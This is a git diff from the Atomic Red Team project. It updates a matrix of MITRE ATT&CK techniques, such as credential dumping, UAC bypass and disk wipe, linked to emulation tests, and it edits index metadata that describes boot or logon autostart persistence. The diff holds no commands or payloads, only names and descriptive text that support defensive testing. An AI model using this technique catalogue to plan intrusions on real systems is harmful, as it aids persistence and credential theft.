+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
+| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Office Test](../../T1137.002/T1137.002.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
+| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
+| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
+| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
+| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
+| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
+| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
+| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
+| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
+| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
+| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
+| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
+| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Web Shell](../../T1505.003/T1505.003.md) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
+| | | [Windows Service](../../T1543.003/T1543.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
@@ -108,7 +110,9 @@
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 883f0a0c..865ac911 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -111,7 +111,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-25T19:57:54.923Z'
+ modified: '2020-07-22T21:36:52.825Z'
created: '2020-01-30T13:58:14.373Z'
x_mitre_data_sources:
- Windows Registry
@@ -637,7 +637,7 @@ privilege-escalation:
and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo
keep shims secure, Windows designed them to run in user mode so they cannot
modify the kernel and you must have administrator privileges to install a
- shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)
+ shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)
(UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data
Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH),
and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims
@@ -1110,10 +1110,22 @@ privilege-escalation:
atomic_tests: []
T1547:
technique:
+ id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf
+ description: |-
+ Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
+
+ Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
+ name: Boot or Logon Autostart Execution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1547
url: https://attack.mitre.org/techniques/T1547
+ - external_id: CAPEC-564
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/564.html
- url: http://msdn.microsoft.com/en-us/library/aa376977
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
12, 2014.
@@ -1137,29 +1149,18 @@ privilege-escalation:
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Boot or Logon Autostart Execution
- description: |-
- Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
-
- Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
- id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-06-30T21:23:15.683Z'
+ modified: '2020-10-09T16:05:36.772Z'
created: '2020-01-23T17:46:59.535Z'
- x_mitre_version: '1.0'
